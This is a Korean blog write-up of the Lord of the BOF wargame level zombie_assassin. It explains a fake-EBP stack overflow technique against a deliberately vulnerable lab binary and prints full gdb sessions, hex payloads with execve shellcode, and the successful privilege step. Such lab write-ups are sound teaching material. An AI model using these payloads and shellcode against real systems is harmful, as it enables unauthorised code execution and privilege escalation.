728x90
반응형
1. intro
2. code 및 분석
2.1. C code
/*
The Lord of the BOF : The Fellowship of the BOF
- zombie_assassin
- FEBP
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack retbayed you!\n");
exit(0);
}
if(argv[1][47] == '\x40')
{
printf("library retbayed you, too!!\n");
exit(0);
}
// strncpy instead of strcpy!
strncpy(buffer, argv[1], 48);
printf("%s\n", buffer);
}
2.2. 분석
이전과 동일하지만 strncpy를 통해 buffer에 복사되는 길이만 다르다.
3. 취약점 확인 및 공격 준비
3.1. 취약점
ret address 변조 가능... 이젠 쓰기도 귀찮아지려 하는구먼 ㅋㅋㅋㅋ
다만, ret address 까지만 복사되기 때문에 이제는 ret gadget으로는 해결이 안 된다.
3.2. 공격 준비
다시 한번 프로그램이 종료될 때를 생각해보자.
leave 시 ebp를 복구하고, ret에서 eip에 값을 넣은 후 jmp eip를 실행한다.
어셈블러 코드로 보면
leave는
mov ebp, esp
pop ebpret은
pop eip
jmp eip이다.
만일 main 함수 에필로그에서 ebp, 즉 sfp에 특정 값을 넣고 ret address 위치에 leave & ret gadget을 삽입한다면, 다시 한번 ebp가 setting 될테고 해당 주소 이후의 값이 ret address가 될 것이다.
그러므로 페이로드를 작성해보면 아래와 같다.
dummy 40 bytes + sfp (actual ret - 4 byte, fake ebp의 주소) 4bytes + ret (leave, ret gadget) 4 bytes
+ dummy (fake ebp) 4 byte + ret (actual ret val's address, fake ebp + 4) 4 byte + actual ret val 4 byte + nop & shellcode
가젯부터 구해보면 main의 그것을 쓰면 될 것 같다.
0x80484df <main+159>: leave
0x80484e0 <main+160>: ret
대략 페이로드를 작성해 실제 주소를 확인해보면 아래와 같다.
(gdb) r `python -c 'print "A"*40 + "BBBB" + "\xdf\x84\x04\x08" + "CCCC" + "DDDD" + "EEEE" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'` Starting program: /home/assassin/zombie_assassia `python -c 'print "A"*40 + "BBBB" + "\xdf\x84\x04\x08" + "CCCC" + "DDDD" + "EEEE" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
/bin/bash2: /home/bugbear/.bashrc: Permission denied
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB߄
Program received signal SIGSEGV, Segmentation fault.
0x80484df in main ()
(gdb) x/40x $esp - 40
....
0xbffffbd8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffbe8: 0x41414141 0x41414141 0x41414141 0x42424242
0xbffffbf8: 0x080484df 0x43434343 0x44444444 0x45454545
0xbffffc08: 0x90909090 0x90909090 0x90909090 0x90909090
4. exploit
위를 토대로 페이로드를 작성해서 시도.
(gdb) r `python -c 'print "A"*40 + "\xfc\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\x08\xfc\xff\xbf" + "\x0c\xfc\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
Starting program: /home/assassin/zombie_assassia `python -c 'print "A"*40 + "\xfc\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\x08\xfc\xff\xbf" + "\x0c\xfc\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
/bin/bash2: /home/bugbear/.bashrc: Permission denied
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄
Program received signal SIGINT, Interrupt.
0xbffffc0c in ?? ()
(gdb) c
Continuing.
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142 rtld.c: No such file or directory.
(gdb) c
Continuing.
euid = 515
pushing me away
gdb에서는 되는데 실 파일에서는 안된다.
[assassin@localhost assassin]$ ./zombie_assassia `python -c 'print "A"*40 + "\xfc\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\x08\xfc\xff\xbf" + "\x0c\xfc\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄
Segmentation fault (core dumped)core 파일을 뜯어보자.
[assassin@localhost assassin]$ gdb -c core
...
Program terminated with signal 11, Segmentation fault.
#0 0x90909090 in ?? ()
...
(gdb) x/40x $esp-41
0xbffffbdb: 0x41414141 0x41414141 0x41414141 0xbffffbfc
0xbffffbeb: 0x080484df 0x44444444 0xbffffc08 0xbffffc0c
0xbffffbfb: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc0b: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc1b: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc2b: 0xc289c031 0x6850c189 0x73736170 0x796d2f68
0xbffffc3b: 0x622f682d 0xe3896e69 0x80cd0bb0 0x44575000
0xbffffc4b: 0x6f682f3d 0x612f656d 0x73617373 0x006e6973
0xbffffc5b: 0x4f4d4552 0x4f484554 0x313d5453 0x312e3239
0xbffffc6b: 0x312e3836 0x00312e37 0x54534f48 0x454d414e이를 토대로 수정 및 재 시도.
[assassin@localhost assassin]$ ./zombie_assassia `python -c 'print "A"*40 + "\xf3\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\xf7\xfb\xff\xbf" + "\xfa\xfb\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄
euid = 515
pushing me away
[assassin@localhost assassin]$ ./zombie_assassin `python -c 'print "A"*40 + "\xf3\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\xf7\xfb\xff\xbf" + "\xfa\xfb\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄
euid = 516
no place to hide728x90
반응형
'Wargame > Hackerchool' 카테고리의 다른 글
| [lob] succubus -> nightmare (0) | 2022.09.21 |
|---|---|
| [lob] zombie_assassin -> succubus (0) | 2022.09.16 |
| [lob] giant -> assassin (0) | 2022.09.16 |
| [lob] bugbear -> giant (0) | 2022.09.15 |
| [lob] darkknight -> bugbear (0) | 2022.09.15 |